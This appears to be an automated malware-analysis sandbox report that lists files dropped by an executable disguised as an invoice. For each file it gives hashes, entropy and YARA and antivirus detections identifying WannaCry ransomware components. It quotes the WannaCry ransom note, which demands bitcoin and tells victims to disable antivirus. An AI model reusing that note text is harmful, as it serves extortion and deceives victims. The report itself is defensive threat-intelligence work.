                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_romanian.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):52161
                                                          Entropy (8bit):4.964306949910696
                                                          Encrypted:false
                                                          SSDEEP:768:Shef3jHdXG2Cz2/vBAOZsQO0cLfnF/Zhcz7sDsYZBB/0gBjL+IU/hbhMVDtsR49P:ShehlrGR1m4dx9mjVyAvg7ouDT
                                                          MD5:313E0ECECD24F4FA1504118A11BC7986
                                                          SHA1:E1B9AE804C7FB1D27F39DB18DC0647BB04E75E9D
                                                          SHA-256:70C0F32ED379AE899E5AC975E20BBBACD295CF7CD50C36174D2602420C770AC1
                                                          SHA-512:C7500363C61BAF8B77FCE796D750F8F5E6886FF0A10F81C3240EA3AD4E5F101B597490DEA8AB6BD9193457D35D8FD579FCE1B88A1C8D85EBE96C66D909630730
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_russian.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):47108
                                                          Entropy (8bit):4.952777691675008
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2qG2aUGs0K6lyZqmfGGHRblldORZeo75Y3kmA31L:Shef3jHdeG2lGsDOcZxbP7ZrS14K
                                                          MD5:452615DB2336D60AF7E2057481E4CAB5
                                                          SHA1:442E31F6556B3D7DE6EB85FBAC3D2957B7F5EAC6
                                                          SHA-256:02932052FAFE97E6ACAAF9F391738A3A826F5434B1A013ABBFA7A6C1ADE1E078
                                                          SHA-512:7613DC329ABE7A3F32164C9A6B660F209A84B774AB9C008BF6503C76255B30EA9A743A6DC49A8DE8DF0BCB9AEA5A33F7408BA27848D9562583FF51991910911F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_slovak.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):41391
                                                          Entropy (8bit):5.027730966276624
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHd4Yb2YG2gNZ8a8zV/8j8U8l8x838Z8Q808m8d8T8hw:Shef3jHdZvG23AZrS14f
                                                          MD5:C911ABA4AB1DA6C28CF86338AB2AB6CC
                                                          SHA1:FEE0FD58B8EFE76077620D8ABC7500DBFEF7C5B0
                                                          SHA-256:E64178E339C8E10EAC17A236A67B892D0447EB67B1DCD149763DAD6FD9F72729
                                                          SHA-512:3491ED285A091A123A1A6D61AAFBB8D5621CCC9E045A237A2F9C2CF6049E7420EB96EF30FDCEA856B50454436E2EC468770F8D585752D73FAFD676C4EF5E800A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_spanish.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):37381
                                                          Entropy (8bit):5.02443306661187
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdf24G2/ezV6YQUdZYlujeMQ9RXmhRweo75Y3kmA31S:Shef3jHdrG2fuhZrS14T
                                                          MD5:8D61648D34CBA8AE9D1E2A219019ADD1
                                                          SHA1:2091E42FC17A0CC2F235650F7AAD87ABF8BA22C2
                                                          SHA-256:72F20024B2F69B45A1391F0A6474E9F6349625CE329F5444AEC7401FE31F8DE1
                                                          SHA-512:68489C33BA89EDFE2E3AEBAACF8EF848D2EA88DCBEF9609C258662605E02D12CFA4FFDC1D266FC5878488E296D2848B2CB0BBD45F1E86EF959BAB6162D284079
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_swedish.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):38483
                                                          Entropy (8bit):5.022972736625151
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdb24G2ZKLVdDeo75Y3kmA31dv61QyE:Shef3jHd/G2w6ZrS14w
                                                          MD5:C7A19984EB9F37198652EAF2FD1EE25C
                                                          SHA1:06EAFED025CF8C4D76966BF382AB0C5E1BD6A0AE
                                                          SHA-256:146F61DB72297C9C0FACFFD560487F8D6A2846ECEC92ECC7DB19C8D618DBC3A4
                                                          SHA-512:43DD159F9C2EAC147CBFF1DDA83F6A83DD0C59D2D7ACAC35BA8B407A04EC9A1110A6A8737535D060D100EDE1CB75078CF742C383948C9D4037EF459D150F6020
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_turkish.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):42582
                                                          Entropy (8bit):5.010722377068833
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHds42WG2mzGu/eo75Y3kmA31dv61QyZ:Shef3jHdsiG2moZrS149
                                                          MD5:531BA6B1A5460FC9446946F91CC8C94B
                                                          SHA1:CC56978681BD546FD82D87926B5D9905C92A5803
                                                          SHA-256:6DB650836D64350BBDE2AB324407B8E474FC041098C41ECAC6FD77D632A36415
                                                          SHA-512:EF25C3CF4343DF85954114F59933C7CC8107266C8BCAC3B5EA7718EB74DBEE8CA8A02DA39057E6EF26B64F1DFCCD720DD3BF473F5AE340BA56941E87D6B796C9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_vietnamese.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):93778
                                                          Entropy (8bit):4.76206134900188
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdW2YG22cViQj3KiG8dpcH8iEriG8E8O83Jz52sxG8h:Shef3jHdWG2+oPZrS14i
                                                          MD5:8419BE28A0DCEC3F55823620922B00FA
                                                          SHA1:2E4791F9CDFCA8ABF345D606F313D22B36C46B92
                                                          SHA-256:1F21838B244C80F8BED6F6977AA8A557B419CF22BA35B1FD4BF0F98989C5BDF8
                                                          SHA-512:8FCA77E54480AEA3C0C7A705263ED8FB83C58974F5F0F62F12CC97C8E0506BA2CDB59B70E59E9A6C44DD7CDE6ADEEEC35B494D31A6A146FF5BA7006136AB9386
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\r.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):864
                                                          Entropy (8bit):4.5335184780121995
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0Ei5bnBR7brW8PNAi0eEprY+Ai75wRZce/:DZD36W5/vWmMo+m
                                                          MD5:3E0020FC529B1C2A061016DD2469BA96
                                                          SHA1:C3A91C22B63F6FE709E7C29CAFB29A2EE83E6ADE
                                                          SHA-256:402751FA49E0CB68FE052CB3DB87B05E71C1D950984D339940CF6B29409F2A7C
                                                          SHA-512:5CA3C134201ED39D96D72911C0498BAE6F98701513FD7F1DC8512819B673F0EA580510FA94ED9413CCC73DA18B39903772A7CBFA3478176181CEE68C896E14CF
                                                          Malicious:false
                                                          Yara Hits:
                                                          • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\Desktop\r.wnry, Author: Florian Roth
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send %s to this bitcoin address: %s.... Next, please find an application file named "%s". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window...

                                                          C:\Users\user\Desktop\s.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                          Category:dropped
                                                          Size (bytes):3038286
                                                          Entropy (8bit):7.998263053003918
                                                          Encrypted:true
                                                          SSDEEP:49152:zUx4db9A1iRdHAHZXaTnCshuTnSQYUB/UZfCg2clOQin2h37l2Jh9iiRKpbXUSH:z/b96AdHA5XaTJvQYUBBgRlJi+rlliRy
                                                          MD5:AD4C9DE7C8C40813F200BA1C2FA33083
                                                          SHA1:D1AF27518D455D432B62D73C6A1497D032F6120E
                                                          SHA-256:E18FDD912DFE5B45776E68D578C3AF3547886CF1353D7086C8BEE037436DFF4B
                                                          SHA-512:115733D08E5F1A514808A20B070DB7FF453FD149865F49C04365A8C6502FA1E5C3A31DA3E21F688AB040F583CF1224A544AEA9708FFAB21405DDE1C57F98E617
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:PK..........!(................Data/PK........M..J................Data/Tor/PK..........!(................Tor/PK..........!(..t.......0.....Tor/libeay32.dll.:.t.e....6m.....Me.Vjil....!..E..T..e...*..e....,.c..o=..t.u..,....J..k-.x.V..:1u....v..7.L~..?{..rN23.w......o..N2....WU..G..G.......Ed..7..q.o.5.]w.{...wl\y..m..w...?]......n......Z]UX./h4.....]...71....e.\^1..I..MH5...k.o+..s...c|s....-#d,!..............eW...?a.......R..I..R......w.....m..#od.*q.&..g.;.C(..t.V...j.Jq%...d_.Js...Hk.j#...DH.....,8_.O...]U....t .......ks:..T...18.C.%ASZJ3.U.nl..J.@)...$...N.s.O........m.0..*e..4.....m...lI..Z..7.f-.?....;...?.SO....}..7#.L8...5.z.~.........E.S..1....7.*.0...pf.....jz.)..Y..8..^....B........p.W..r..B.....p..?......../`*Wl..D.xAi..$..d.......&..p. ..bOtE.\.......(..&A...6v..S..Q...L...3 .:.6.m7.'.......)......iH.NZ_t.;./.a..n.g...A`.T.k.........."...<.rt..3....0.{N..yy...p.z.=..#.u.u...d......mQ..*.H..2.N.BRSN...XC....).".@.._.18.&...n

                                                          C:\Users\user\Desktop\t.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65816
                                                          Entropy (8bit):7.997276137881339
                                                          Encrypted:true
                                                          SSDEEP:1536:am+vLII5ygV8/tuH+P9zxqDKvARpmKiRMkTERU:a9LAg4tXPTEKvADmFgRU
                                                          MD5:5DCAAC857E695A65F5C3EF1441A73A8F
                                                          SHA1:7B10AAEEE05E7A1EFB43D9F837E9356AD55C07DD
                                                          SHA-256:97EBCE49B14C46BEBC9EC2448D00E1E397123B256E2BE9EBA5140688E7BC0AE6
                                                          SHA-512:06EB5E49D19B71A99770D1B11A5BB64A54BF3352F36E39A153469E54205075C203B08128DC2317259DB206AB5323BDD93AAA252A066F57FB5C52FF28DEEDB5E2
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....8"'....].~>(...*PdIf.'.m>...2.0.`p...^...#I|..<.W.B.=....M..zxFp....0e...P...."....nhB)>....B..}.[d$......,...8.....k$.....S.w+.....N.....p/...Y.LC......9L.\!u...?hH".<d..dS%A.......Iu...nEi7I.....8.V..:F....-...,........\....}..`1?..m..5g.I'..................q.\..9`..t.....a......(|.8.L....67.gjrS.|.e...f.Fi......\...r.k.!d......8.'g1y+..'.i1t.L.>.u..:......<.fN.:Tf{..M.....W....._......_:...rR(.M..A?:...H.W.....=l......r..f..JX...:.z.rC.....f.X Qx.4....2....&w+..&kDqFU..u.............Sg..4k..<5.Zd$F.ED...1.S.d.. .eW.i....p.2..&.~S.l.R8$&q.L3.<.2....x ..by.zO.w. .hs.q.....I.1..D.F...J).&.....SD..v..m...V.....G...B`.u>K@.\_N......#.|..w.....Z.).X..[..o.(.'.~.nq.hq1.....:!.Q.P...c.KA,.3..m...j>.X.;..<.*."AU..R....Y....d]....U....).@...Q....|K.=.d.cI.x.....O...\(.%}.j..YG}...i.....R..j.`..9...5.....o..U...xu>+.$y...z... ...5......s..e...G...W.".T.'..iH..B.Sl...h..7B..E.8.....K.bRm...FE..W'_Q1...... ...A.5.}..%.../^VL.;.".w

                                                          C:\Users\user\Desktop\taskdl.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):3.1664845408760636
                                                          Encrypted:false
                                                          SSDEEP:96:Udocv5e0e1wWtaLYjJN0yDGgI2u9+w5eOIMviS0jPtboyn15EWBwwWwT:6oL0edtJN7qvAZM6S0jP1oynkWBwwWg
                                                          MD5:4FEF5E34143E646DBF9907C4374276F5
                                                          SHA1:47A9AD4125B6BD7C55E4E7DA251E23F089407B8F
                                                          SHA-256:4A468603FDCB7A2EB5770705898CF9EF37AADE532A7964642ECD705A74794B79
                                                          SHA-512:4550DD1787DEB353EBD28363DD2CDCCCA861F6A5D9358120FA6AA23BAA478B2A9EB43CEF5E3F6426F708A0753491710AC05483FAC4A046C26BEC4234122434D5
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 89%
                                                          • Antivirus: Virustotal, Detection: 88%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=..y..y..y......x......r......x......}.....z..y..Q..O..x..Richy..........PE..L...W.[J.....................0............... ....@..........................P...............................................!..P....@............................................................................... ...............................text............................... ..`.rdata..z.... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\Desktop\taskse.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):2.5252509618107535
                                                          Encrypted:false
                                                          SSDEEP:96:UjpvOHheaCDCNIOgTegoddPtboyX7cvp0EWy1HlWwr:UjVWEam7ofP1oyX7olWUHlW0
                                                          MD5:8495400F199AC77853C53B5A3F278F3E
                                                          SHA1:BE5D6279874DA315E3080B06083757AAD9B32C23
                                                          SHA-256:2CA2D550E603D74DEDDA03156023135B38DA3630CB014E3D00B1263358C5F00D
                                                          SHA-512:0669C524A295A049FA4629B26F89788B2A74E1840BCDC50E093A0BD40830DD1279C9597937301C0072DB6ECE70ADEE4ACE67C3C8A4FB2DB6DEAFD8F1E887ABE4
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 87%
                                                          • Antivirus: Virustotal, Detection: 88%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#O..g.v.g.v.g.v..2x.f.v..1|.l.v..1r.e.v.!+.d.v.g.w...v.Q.}.f.v.Richg.v.........PE..L.....[J.....................0......L........ ....@..........................P..............................................| ..<....@............................................................................... ..`............................text............................... ..`.rdata....... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\Desktop\u.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):245760
                                                          Entropy (8bit):6.278920408390635
                                                          Encrypted:false
                                                          SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                          MD5:7BF2B57F2A205768755C07F238FB32CC
                                                          SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                          SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                          SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\u.wnry, Author: Joe Security
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\u.wnry, Author: ReversingLabs
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          • Antivirus: Virustotal, Detection: 90%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\Documents\@Please_Read_Me@.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
